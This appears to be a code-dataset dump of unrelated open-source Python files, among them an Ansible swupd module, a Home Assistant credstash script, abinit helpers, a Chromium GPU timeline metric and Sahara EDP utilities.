repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
tdtrask/ansible
|
refs/heads/devel
|
lib/ansible/modules/packaging/os/swupd.py
|
49
|
#!/usr/bin/python
# (c) 2017, Alberto Murillo <alberto.murillo.silva@intel.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: swupd
short_description: Manages updates and bundles in ClearLinux systems.
description:
- Manages updates and bundles with the swupd bundle manager, which is used by the
Clear Linux Project for Intel Architecture.
version_added: "2.3"
author: Alberto Murillo (@albertomurillo)
options:
contenturl:
description:
- URL pointing to the contents of available bundles.
If not specified, the contents are retrieved from clearlinux.org.
required: false
default: null
format:
description:
- The format suffix for version file downloads. For example [1,2,3,staging,etc].
If not specified, the default format is used.
required: false
default: null
manifest:
description:
- The manifest contains information about the bundles at certaion version of the OS.
Specify a Manifest version to verify against that version or leave unspecified to
verify against the current version.
required: false
default: null
aliases: [release, version]
name:
description:
- Name of the (I)bundle to install or remove.
required: false
default: null
aliases: [bundle]
state:
description:
- Indicates the desired (I)bundle state. C(present) ensures the bundle
is installed while C(absent) ensures the (I)bundle is not installed.
required: false
default: present
choices: [present, absent]
update:
description:
- Updates the OS to the latest version.
required: false
default: no
url:
description:
- Overrides both I(contenturl) and I(versionurl).
required: false
default: null
verify:
description:
- Verify content for OS version.
required: false
default: null
versionurl:
description:
- URL for version string download.
required: false
default: null
'''
EXAMPLES = '''
- name: Update the OS to the latest version
swupd:
update: yes
- name: Installs the "foo" bundle
swupd:
name: foo
state: present
- name: Removes the "foo" bundle
swupd:
name: foo
state: absent
- name: Check integrity of filesystem
swupd:
verify: yes
- name: Downgrade OS to release 12920
swupd:
verify: yes
manifest: 12920
'''
RETURN = '''
stdout:
description: stdout of swupd
returned: always
type: string
stderr:
description: stderr of swupd
returned: always
type: string
'''
import os
from ansible.module_utils.basic import AnsibleModule
class Swupd(object):
FILES_NOT_MATCH = "files did not match"
FILES_REPLACED = "missing files were replaced"
FILES_FIXED = "files were fixed"
FILES_DELETED = "files were deleted"
def __init__(self, module):
# Fail if swupd is not found
self.module = module
self.swupd_cmd = module.get_bin_path("swupd", False)
if not self.swupd_cmd:
module.fail_json(msg="Could not find swupd.")
# Initialize parameters
for key in module.params.keys():
setattr(self, key, module.params[key])
# Initialize return values
self.changed = False
self.failed = False
self.msg = None
self.rc = None
self.stderr = ""
self.stdout = ""
def _run_cmd(self, cmd):
self.rc, self.stdout, self.stderr = self.module.run_command(cmd, check_rc=False)
def _get_cmd(self, command):
cmd = "%s %s" % (self.swupd_cmd, command)
if self.format:
cmd += " --format=%s" % self.format
if self.manifest:
cmd += " --manifest=%s" % self.manifest
if self.url:
cmd += " --url=%s" % self.url
else:
if self.contenturl and command != "check-update":
cmd += " --contenturl=%s" % self.contenturl
if self.versionurl:
cmd += " --versionurl=%s" % self.versionurl
return cmd
def _is_bundle_installed(self, bundle):
try:
os.stat("/usr/share/clear/bundles/%s" % bundle)
except OSError:
return False
return True
def _needs_update(self):
cmd = self._get_cmd("check-update")
self._run_cmd(cmd)
if self.rc == 0:
return True
if self.rc == 1:
return False
self.failed = True
self.msg = "Failed to check for updates"
def _needs_verify(self):
cmd = self._get_cmd("verify")
self._run_cmd(cmd)
if self.rc != 0:
self.failed = True
self.msg = "Failed to check for filesystem inconsistencies."
if self.FILES_NOT_MATCH in self.stdout:
return True
return False
def install_bundle(self, bundle):
"""Installs a bundle with `swupd bundle-add bundle`"""
if self.module.check_mode:
self.module.exit_json(changed=not self._is_bundle_installed(bundle))
if self._is_bundle_installed(bundle):
self.msg = "Bundle %s is already installed" % bundle
return
cmd = self._get_cmd("bundle-add %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s installed" % bundle
return
if self.rc == 18:
self.msg = "Bundle name %s is invalid" % bundle
return
self.failed = True
self.msg = "Failed to install bundle %s" % bundle
def remove_bundle(self, bundle):
"""Removes a bundle with `swupd bundle-remove bundle`"""
if self.module.check_mode:
self.module.exit_json(changed=self._is_bundle_installed(bundle))
if not self._is_bundle_installed(bundle):
self.msg = "Bundle %s not installed"
return
cmd = self._get_cmd("bundle-remove %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s removed" % bundle
return
self.failed = True
self.msg = "Failed to remove bundle %s" % bundle
def update_os(self):
"""Updates the os with `swupd update`"""
if self.module.check_mode:
self.module.exit_json(changed=self._needs_update())
if not self._needs_update():
self.msg = "There are no updates available"
return
cmd = self._get_cmd("update")
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Update successful"
return
self.failed = True
self.msg = "Failed to check for updates"
def verify_os(self):
"""Verifies filesystem against specified or current version"""
if self.module.check_mode:
self.module.exit_json(changed=self._needs_verify())
if not self._needs_verify():
self.msg = "No files where changed"
return
cmd = self._get_cmd("verify --fix")
self._run_cmd(cmd)
if self.rc == 0 and (self.FILES_REPLACED in self.stdout or self.FILES_FIXED in self.stdout or self.FILES_DELETED in self.stdout):
self.changed = True
self.msg = "Fix successful"
return
self.failed = True
self.msg = "Failed to verify the OS"
def main():
"""The main function."""
module = AnsibleModule(
argument_spec=dict(
contenturl=dict(type="str"),
format=dict(type="str"),
manifest=dict(aliases=["release", "version"], type="int"),
name=dict(aliases=["bundle"], type="str"),
state=dict(default="present", choices=["present", "absent"], type="str"),
update=dict(default=False, type="bool"),
url=dict(type="str"),
verify=dict(default=False, type="bool"),
versionurl=dict(type="str"),
),
required_one_of=[["name", "update", "verify"]],
mutually_exclusive=[["name", "update", "verify"]],
supports_check_mode=True
)
swupd = Swupd(module)
name = module.params["name"]
state = module.params["state"]
update = module.params["update"]
verify = module.params["verify"]
if update:
swupd.update_os()
elif verify:
swupd.verify_os()
elif state == "present":
swupd.install_bundle(name)
elif state == "absent":
swupd.remove_bundle(name)
else:
swupd.failed = True
if swupd.failed:
module.fail_json(msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
else:
module.exit_json(changed=swupd.changed, msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
if __name__ == '__main__':
main()
|
detiber/ansible
|
refs/heads/devel
|
test/integration/targets/module_utils/module_utils/spam3/ham/bacon.py
|
298
|
data = 'spam3'
|
f-u-n/playtime
|
refs/heads/master
|
count_the_ones/g3wanghc/count_ones.py
|
2
|
def countTheOnes (number):
return len(list(filter(lambda n: n == '1', str(number))))
print(countTheOnes(467))
print(countTheOnes(81511))
print(countTheOnes(123))
|
aronsky/home-assistant
|
refs/heads/dev
|
homeassistant/scripts/credstash.py
|
7
|
"""Script to get, put and delete secrets stored in credstash."""
import argparse
import getpass
from homeassistant.util.yaml import _SECRET_NAMESPACE
REQUIREMENTS = ['credstash==1.14.0', 'botocore==1.7.34']
def run(args):
"""Handle credstash script."""
parser = argparse.ArgumentParser(
description=("Modify Home Assistant secrets in credstash."
"Use the secrets in configuration files with: "
"!secret <name>"))
parser.add_argument(
'--script', choices=['credstash'])
parser.add_argument(
'action', choices=['get', 'put', 'del', 'list'],
help="Get, put or delete a secret, or list all available secrets")
parser.add_argument(
'name', help="Name of the secret", nargs='?', default=None)
parser.add_argument(
'value', help="The value to save when putting a secret",
nargs='?', default=None)
# pylint: disable=import-error, no-member
import credstash
import botocore
args = parser.parse_args(args)
table = _SECRET_NAMESPACE
try:
credstash.listSecrets(table=table)
except botocore.errorfactory.ClientError:
credstash.createDdbTable(table=table)
if args.action == 'list':
secrets = [i['name'] for i in credstash.listSecrets(table=table)]
deduped_secrets = sorted(set(secrets))
print('Saved secrets:')
for secret in deduped_secrets:
print(secret)
return 0
if args.name is None:
parser.print_help()
return 1
if args.action == 'put':
if args.value:
the_secret = args.value
else:
the_secret = getpass.getpass('Please enter the secret for {}: '
.format(args.name))
current_version = credstash.getHighestVersion(args.name, table=table)
credstash.putSecret(args.name,
the_secret,
version=int(current_version) + 1,
table=table)
print('Secret {} put successfully'.format(args.name))
elif args.action == 'get':
the_secret = credstash.getSecret(args.name, table=table)
if the_secret is None:
print('Secret {} not found'.format(args.name))
else:
print('Secret {}={}'.format(args.name, the_secret))
elif args.action == 'del':
credstash.deleteSecrets(args.name, table=table)
print('Deleted secret {}'.format(args.name))
|
mailhexu/pyDFTutils
|
refs/heads/master
|
build/lib/pyDFTutils/abinit/abinit.py
|
2
|
#!/usr/bin/env abinit
"""
abinit calculator helper functions. Set default values for the calculations.
See also ase.calculator.abinit, ase_utils.myabinit
"""
from ase.units import eV, Ha, Bohr
from ase_utils.myabinit import Abinit
from ase.data import atomic_masses, atomic_numbers, chemical_symbols, atomic_masses
from ase.atoms import Atoms
import numpy as np
def abinit_calculator(ecut=35 * Ha,
xc='LDA',
nk=8,
mag_order='PM',
is_metal=False,
pps='ONCV',
**kwargs):
"""
default vasp calculator.
Parameters
------------
ecut: float
energy cutoff
xc: string
XC functional
nk: int
k-point mesh nk*nk*nk. use kpts=[nk1,nk2,nk3] for unequal nk's.
mag_order: string
FM|PM|A|G|C|
is_metal: bool
is it metallic? it unkown, set is_metal to True.
**kwargs:
args passed to myvasp.set function.
Returns
------------
A abinit calculator object. derived from ase.calculator.abinit
"""
calc = Abinit(
label='abinit',
xc=xc,
accuracy=5,
ecut=ecut * eV,
kpts=[nk, nk, nk],
gamma=False,
#chksymbreak=0,
pppaths=['/home/hexu/.local/pp/abinit/'],
pps=pps,
chksymbreak=0,
pawecutdg=ecut * 1.8 * eV,
diemac=5.4,
diemix=0.7,
#iprcel=45,
autoparal=1, )
if mag_order == 'PM' and is_metal:
calc.set(occopt=7, nsppol=1, nspinor=1, nspden=1, diemac=1e5)
calc.set(tsmear=0.001 * Ha)
elif mag_order == 'PM' and not is_metal:
calc.set(occopt=1, nsppol=1, nspinor=1, nspden=1)
elif mag_order == 'FM' or is_metal:
calc.set(occopt=4, nsppol=2)
calc.set(tsmear=0.001 * Ha, diemac=1e5)
else:
calc.set(occopt=1, nsppol=1, nspinor=1, nspden=2)
calc.set(iscf=17, nstep=50)
calc.set(**kwargs)
return calc
class DDB_reader():
def __init__(self, fname):
"""
class for reading DDB files.
"""
self.fname = fname
def read_atoms(self):
"""
read atomic structure from DDB file.
Returns:
-----------
ase.atoms object.
"""
with open(self.fname) as myfile:
for line in myfile:
if line.strip().startswith('natom'):
self.natom = int(line.strip().split()[-1])
if line.strip().startswith("ntypat"):
ntypat = int(line.strip().split()[-1])
if line.strip().startswith("acell"):
acell = [
float(s.replace('D', 'E')) * Bohr
for s in line.strip().split()[1:4]
]
if line.strip().startswith("typat"):
typat = [int(s) for s in line.strip().split()[1:]]
if line.strip().startswith("znucl"):
znucl = [
int(float(s.replace('D', 'E')))
for s in line.strip().split()[1:4]
]
if line.strip().startswith("rprim"):
rprim0 = [
float(s.replace('D', 'E')) * acell[0]
for s in line.strip().split()[1:4]
]
line = myfile.next()
rprim1 = [
float(s.replace('D', 'E')) * acell[1]
for s in line.strip().split()
]
line = myfile.next()
rprim2 = [
float(s.replace('D', 'E')) * acell[2]
for s in line.strip().split()
]
if line.strip().startswith("xred"):
spos = np.zeros((
self.natom,
3, ))
spos[0] = [
float(s.replace('D', 'E'))
for s in line.strip().split()[-3:]
]
for i in range(1, self.natom):
line = myfile.next()
print line
spos[i] = [
float(s.replace('D', 'E'))
for s in line.strip().split()[-3:]
]
numbers = [znucl[i - 1] for i in typat]
self.symbols = [chemical_symbols[i] for i in numbers]
self.masses = [atomic_masses[i] for i in numbers]
self.cell = [rprim0, rprim1, rprim2]
print self.symbols
self.atoms = Atoms(self.symbols, positions=spos, cell=self.cell)
return self.atoms
def read_2DE_DDB(self, mat=True):
"""
Read total energy 2nd derivatives from DDB files.
Parameters:
-------------
fname: string
The name of the DDB file.
Returns:
-------------
dict dds.
The keys are tuples: (idir1, ipert1, idir2, ipert2), values are complex numbers.
idir, idir2 are the directions (1,2,3), ipert1, ipert2 are perturbations.
ipert= 1..natom are atomic displacements;
natom+1: ddk;
natom+2: electric field;
natom+3: uniaxial strains;
natom+4: shear strain.
"""
dds = {}
with open(self.fname) as myfile:
for line in myfile:
if line.find('**** Database of total energy derivatives ****'
) != -1:
l = myfile.next()
nblock = int(l.strip().split()[-1])
#print "Nblock:",nblock
myfile.next()
l = myfile.next()
nelem = int(l.strip().split()[-1])
#print nelem
l = myfile.next()
self.qpt = [
float(x.replace('D', 'E'))
for x in l.strip().split()[1:4]
]
#print qpts
for i in range(nelem):
try:
l = myfile.next()
idir1, ipert1, idir2, ipert2 = [
int(x) for x in l.strip().split()[0:4]
]
realval, imageval = [
float(x.replace('D', 'E'))
for x in l.strip().split()[4:6]
]
dds[(idir1, ipert1, idir2,
ipert2)] = realval + 1j * imageval
except:
pass
self.dynamic_matrix_dict = dds
return self.dynamic_matrix_dict
def get_dynamic_matrix(self):
"""
Parameters:
------------
dds: output or read_2DE_DDB
Returns:
------------
2D matrix. the indices means: (ipert,idir) = (1,1) (1,2) (1,3) (2,1) ...(natom,3)
"""
natom = len(self.atoms)
dynmat = np.zeros((natom * 3, natom * 3), dtype=complex)
for ipert1 in range(natom):
for idir1 in range(3):
for ipert2 in range(natom):
for idir2 in range(3):
dynmat[ipert1 * 3 + idir1, ipert2 * 3 +
idir2] = self.dynamic_matrix_dict[(
idir1+1, ipert1+1, idir2+1, ipert2+1)]
return dynmat
#myreader = DDB_reader("../test/BaTiO3_bak/abinito_DS2_DDB")
#print myreader.read_atoms().get_positions()
#myreader.read_2DE_DDB()
#print myreader.get_dynamic_matrix()
|
jymannob/CouchPotatoServer
|
refs/heads/develop
|
libs/rsa/__init__.py
|
111
|
# -*- coding: utf-8 -*-
#
# Copyright 2011 Sybren A. Stüvel <sybren@stuvel.eu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""RSA module
Module for calculating large primes, and RSA encryption, decryption, signing
and verification. Includes generating public and private keys.
WARNING: this implementation does not use random padding, compression of the
cleartext input to prevent repetitions, or other common security improvements.
Use with care.
If you want to have a more secure implementation, use the functions from the
``rsa.pkcs1`` module.
"""
__author__ = "Sybren Stuvel, Barry Mead and Yesudeep Mangalapilly"
__date__ = "2012-06-17"
__version__ = '3.1.1'
from rsa.key import newkeys, PrivateKey, PublicKey
from rsa.pkcs1 import encrypt, decrypt, sign, verify, DecryptionError, \
VerificationError
# Do doctest if we're run directly
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["newkeys", "encrypt", "decrypt", "sign", "verify", 'PublicKey',
'PrivateKey', 'DecryptionError', 'VerificationError']
|
Workday/OpenFrame
|
refs/heads/master
|
tools/telemetry/telemetry/web_perf/metrics/gpu_timeline.py
|
15
|
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import math
import sys
from telemetry.timeline import model as model_module
from telemetry.value import improvement_direction
from telemetry.value import list_of_scalar_values
from telemetry.value import scalar
from telemetry.web_perf.metrics import timeline_based_metric
TOPLEVEL_GL_CATEGORY = 'gpu_toplevel'
TOPLEVEL_SERVICE_CATEGORY = 'disabled-by-default-gpu.service'
TOPLEVEL_DEVICE_CATEGORY = 'disabled-by-default-gpu.device'
SERVICE_FRAME_END_MARKER = (TOPLEVEL_SERVICE_CATEGORY, 'SwapBuffer')
DEVICE_FRAME_END_MARKER = (TOPLEVEL_DEVICE_CATEGORY, 'SwapBuffer')
TRACKED_GL_CONTEXT_NAME = {'RenderCompositor': 'render_compositor',
'BrowserCompositor': 'browser_compositor',
'Compositor': 'browser_compositor'}
def _CalculateFrameTimes(events_per_frame, event_data_func):
"""Given a list of events per frame and a function to extract event time data,
returns a list of frame times."""
times_per_frame = []
for event_list in events_per_frame:
event_times = [event_data_func(event) for event in event_list]
times_per_frame.append(sum(event_times))
return times_per_frame
def _CPUFrameTimes(events_per_frame):
"""Given a list of events per frame, returns a list of CPU frame times."""
# CPU event frames are calculated using the event thread duration.
# Some platforms do not support thread_duration, convert those to 0.
return _CalculateFrameTimes(events_per_frame,
lambda event: event.thread_duration or 0)
def _GPUFrameTimes(events_per_frame):
"""Given a list of events per frame, returns a list of GPU frame times."""
# GPU event frames are asynchronous slices which use the event duration.
return _CalculateFrameTimes(events_per_frame,
lambda event: event.duration)
def TimelineName(name, source_type, value_type):
"""Constructs the standard name given in the timeline.
Args:
name: The name of the timeline, for example "total", or "render_compositor".
source_type: One of "cpu", "gpu" or None. None is only used for total times.
value_type: the type of value. For example "mean", "stddev"...etc.
"""
if source_type:
return '%s_%s_%s_time' % (name, value_type, source_type)
else:
return '%s_%s_time' % (name, value_type)
class GPUTimelineMetric(timeline_based_metric.TimelineBasedMetric):
"""Computes GPU based metrics."""
def __init__(self):
super(GPUTimelineMetric, self).__init__()
def AddResults(self, model, _, interaction_records, results):
self.VerifyNonOverlappedRecords(interaction_records)
service_times = self._CalculateGPUTimelineData(model)
for value_item, durations in service_times.iteritems():
count = len(durations)
avg = 0.0
stddev = 0.0
maximum = 0.0
if count:
avg = sum(durations) / count
stddev = math.sqrt(sum((d - avg) ** 2 for d in durations) / count)
maximum = max(durations)
name, src = value_item
if src:
frame_times_name = '%s_%s_frame_times' % (name, src)
else:
frame_times_name = '%s_frame_times' % (name)
if durations:
results.AddValue(list_of_scalar_values.ListOfScalarValues(
results.current_page, frame_times_name, 'ms', durations,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
results.AddValue(scalar.ScalarValue(
results.current_page, TimelineName(name, src, 'max'), 'ms', maximum,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
results.AddValue(scalar.ScalarValue(
results.current_page, TimelineName(name, src, 'mean'), 'ms', avg,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
results.AddValue(scalar.ScalarValue(
results.current_page, TimelineName(name, src, 'stddev'), 'ms', stddev,
tir_label=interaction_records[0].label,
improvement_direction=improvement_direction.DOWN))
def _CalculateGPUTimelineData(self, model):
"""Uses the model and calculates the times for various values for each
frame. The return value will be a dictionary of the following format:
{
(EVENT_NAME1, SRC1_TYPE): [FRAME0_TIME, FRAME1_TIME...etc.],
(EVENT_NAME2, SRC2_TYPE): [FRAME0_TIME, FRAME1_TIME...etc.],
}
Events:
swap - The time in milliseconds between each swap marker.
total - The amount of time spent in the renderer thread.
TRACKED_NAMES: Using the TRACKED_GL_CONTEXT_NAME dict, we
include the traces per frame for the
tracked name.
Source Types:
None - This will only be valid for the "swap" event.
cpu - For an event, the "cpu" source type signifies time spent on the
gpu thread using the CPU. This uses the "gpu.service" markers.
gpu - For an event, the "gpu" source type signifies time spent on the
gpu thread using the GPU. This uses the "gpu.device" markers.
"""
all_service_events = []
current_service_frame_end = sys.maxint
current_service_events = []
all_device_events = []
current_device_frame_end = sys.maxint
current_device_events = []
tracked_events = {}
tracked_events.update(
dict([((value, 'cpu'), [])
for value in TRACKED_GL_CONTEXT_NAME.itervalues()]))
tracked_events.update(
dict([((value, 'gpu'), [])
for value in TRACKED_GL_CONTEXT_NAME.itervalues()]))
# These will track traces within the current frame.
current_tracked_service_events = collections.defaultdict(list)
current_tracked_device_events = collections.defaultdict(list)
event_iter = model.IterAllEvents(
event_type_predicate=model_module.IsSliceOrAsyncSlice)
for event in event_iter:
# Look for frame end markers
if (event.category, event.name) == SERVICE_FRAME_END_MARKER:
current_service_frame_end = event.end
elif (event.category, event.name) == DEVICE_FRAME_END_MARKER:
current_device_frame_end = event.end
# Track all other toplevel gl category markers
elif event.args.get('gl_category', None) == TOPLEVEL_GL_CATEGORY:
base_name = event.name
dash_index = base_name.rfind('-')
if dash_index != -1:
base_name = base_name[:dash_index]
tracked_name = TRACKED_GL_CONTEXT_NAME.get(base_name, None)
if event.category == TOPLEVEL_SERVICE_CATEGORY:
# Check if frame has ended.
if event.start >= current_service_frame_end:
if current_service_events:
all_service_events.append(current_service_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'cpu')].append(
current_tracked_service_events[value])
current_service_events = []
current_service_frame_end = sys.maxint
current_tracked_service_events.clear()
current_service_events.append(event)
if tracked_name:
current_tracked_service_events[tracked_name].append(event)
elif event.category == TOPLEVEL_DEVICE_CATEGORY:
# Check if frame has ended.
if event.start >= current_device_frame_end:
if current_device_events:
all_device_events.append(current_device_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'gpu')].append(
current_tracked_device_events[value])
current_device_events = []
current_device_frame_end = sys.maxint
current_tracked_device_events.clear()
current_device_events.append(event)
if tracked_name:
current_tracked_device_events[tracked_name].append(event)
# Append Data for Last Frame.
if current_service_events:
all_service_events.append(current_service_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'cpu')].append(
current_tracked_service_events[value])
if current_device_events:
all_device_events.append(current_device_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
tracked_events[(value, 'gpu')].append(
current_tracked_device_events[value])
# Calculate Mean Frame Time for the CPU side.
frame_times = []
if all_service_events:
prev_frame_end = all_service_events[0][0].start
for event_list in all_service_events:
last_service_event_in_frame = event_list[-1]
frame_times.append(last_service_event_in_frame.end - prev_frame_end)
prev_frame_end = last_service_event_in_frame.end
# Create the timeline data dictionary for service side traces.
total_frame_value = ('swap', None)
cpu_frame_value = ('total', 'cpu')
gpu_frame_value = ('total', 'gpu')
timeline_data = {}
timeline_data[total_frame_value] = frame_times
timeline_data[cpu_frame_value] = _CPUFrameTimes(all_service_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
cpu_value = (value, 'cpu')
timeline_data[cpu_value] = _CPUFrameTimes(tracked_events[cpu_value])
# Add in GPU side traces if it was supported (IE. device traces exist).
if all_device_events:
timeline_data[gpu_frame_value] = _GPUFrameTimes(all_device_events)
for value in TRACKED_GL_CONTEXT_NAME.itervalues():
gpu_value = (value, 'gpu')
tracked_gpu_event = tracked_events[gpu_value]
timeline_data[gpu_value] = _GPUFrameTimes(tracked_gpu_event)
return timeline_data
|
xkmato/casepro
|
refs/heads/master
|
casepro/cases/migrations/0028_case_initial_message.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals
from django.db import migrations, models
def populate_initial_message(apps, schema_editor):
Message = apps.get_model('msgs', 'Message')
Case = apps.get_model('cases', 'Case')
cases = list(Case.objects.all())
num_missing = 0
for case in cases:
message = Message.objects.filter(org=case.org, backend_id=case.message_id).select_related('contact').first()
if message:
case.contact = message.contact
case.initial_message = message
case.save(update_fields=('initial_message',))
else:
print("Missing message #%d for org #%d" % (case.message_id, case.org_id))
num_missing += 1
if cases:
print("Updated %d cases (%d missing messages)" % (len(cases), num_missing))
class Migration(migrations.Migration):
dependencies = [
('msgs', '0020_auto_20160303_1058'),
('cases', '0027_auto_20160222_1250'),
]
operations = [
migrations.AddField(
model_name='case',
name='initial_message',
field=models.OneToOneField(related_name='initial_case', null=True, to='msgs.Message'),
),
migrations.RunPython(populate_initial_message),
migrations.RemoveField(
model_name='case',
name='message_on',
)
]
|
beatrizjesus/my-first-blog
|
refs/heads/master
|
pasta/Lib/site-packages/pip/_vendor/colorama/__init__.py
|
445
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from .initialise import init, deinit, reinit
from .ansi import Fore, Back, Style, Cursor
from .ansitowin32 import AnsiToWin32
__version__ = '0.3.3'
|
jeffery9/mixprint_addons
|
refs/heads/master
|
l10n_fr/report/__init__.py
|
15
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import base_report
import bilan_report
import compute_resultant_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
crobby/sahara
|
refs/heads/master
|
sahara/utils/edp.py
|
3
|
# Copyright (c) 2014 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import six
from sahara.utils import files
# job execution status
JOB_STATUS_DONEWITHERROR = 'DONEWITHERROR'
JOB_STATUS_FAILED = 'FAILED'
JOB_STATUS_KILLED = 'KILLED'
JOB_STATUS_PENDING = 'PENDING'
JOB_STATUS_RUNNING = 'RUNNING'
JOB_STATUS_SUCCEEDED = 'SUCCEEDED'
JOB_STATUS_TOBEKILLED = 'TOBEKILLED'
# statuses for terminated jobs
JOB_STATUSES_TERMINATED = [
JOB_STATUS_DONEWITHERROR,
JOB_STATUS_FAILED,
JOB_STATUS_KILLED,
JOB_STATUS_SUCCEEDED
]
# job type separator character
JOB_TYPE_SEP = '.'
# job sub types available
JOB_SUBTYPE_STREAMING = 'Streaming'
JOB_SUBTYPE_NONE = ''
# job types available
JOB_TYPE_HIVE = 'Hive'
JOB_TYPE_JAVA = 'Java'
JOB_TYPE_MAPREDUCE = 'MapReduce'
JOB_TYPE_SPARK = 'Spark'
JOB_TYPE_STORM = 'Storm'
JOB_TYPE_MAPREDUCE_STREAMING = (JOB_TYPE_MAPREDUCE + JOB_TYPE_SEP +
JOB_SUBTYPE_STREAMING)
JOB_TYPE_PIG = 'Pig'
JOB_TYPE_SHELL = 'Shell'
# job type groupings available
JOB_TYPES_ALL = [
JOB_TYPE_HIVE,
JOB_TYPE_JAVA,
JOB_TYPE_MAPREDUCE,
JOB_TYPE_MAPREDUCE_STREAMING,
JOB_TYPE_PIG,
JOB_TYPE_SHELL,
JOB_TYPE_SPARK,
JOB_TYPE_STORM
]
JOB_TYPES_ACCEPTABLE_CONFIGS = {
JOB_TYPE_HIVE: {"configs", "params"},
JOB_TYPE_PIG: {"configs", "params", "args"},
JOB_TYPE_MAPREDUCE: {"configs"},
JOB_TYPE_MAPREDUCE_STREAMING: {"configs"},
JOB_TYPE_JAVA: {"configs", "args"},
JOB_TYPE_SHELL: {"configs", "params", "args"},
JOB_TYPE_SPARK: {"configs", "args"},
JOB_TYPE_STORM: {"args"}
}
ADAPT_FOR_OOZIE = 'edp.java.adapt_for_oozie'
ADAPT_SPARK_FOR_SWIFT = 'edp.spark.adapt_for_swift'
def split_job_type(job_type):
'''Split a job type string into a type and subtype
The split is done on the first '.'. A subtype will
always be returned, even if it is empty.
'''
type_info = job_type.split(JOB_TYPE_SEP, 1)
if len(type_info) == 1:
type_info.append('')
return type_info
def compare_job_type(job_type, *args, **kwargs):
'''Compare a job type against a list of job types
:param job_type: The job type being compared
:param *args: A list of types to compare against
:param strict: Passed as a keyword arg. Default is False.
If strict is False, job_type will be compared
with and without its subtype indicator.
:returns: True if job_type is present in the list, False otherwise
'''
strict = kwargs.get('strict', False)
res = job_type in args
if res or strict or JOB_TYPE_SEP not in job_type:
return res
jtype, jsubtype = split_job_type(job_type)
return jtype in args
def get_hive_shared_conf_path(hdfs_user):
return "/user/%s/conf/hive-site.xml" % hdfs_user
def is_adapt_for_oozie_enabled(configs):
return configs.get(ADAPT_FOR_OOZIE, False)
def is_adapt_spark_for_swift_enabled(configs):
return configs.get(ADAPT_SPARK_FOR_SWIFT, False)
def get_builtin_binaries(job, configs):
if job.type == JOB_TYPE_JAVA:
if is_adapt_for_oozie_enabled(configs):
path = 'service/edp/resources/edp-main-wrapper.jar'
name = 'builtin-%s.jar' % six.text_type(uuid.uuid4())
return [{'raw': files.get_file_binary(path),
'name': name}]
return []
|
knabar/openmicroscopy
|
refs/heads/develop
|
components/tools/OmeroPy/test/unit/clitest/test_download.py
|
15
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
import pytest
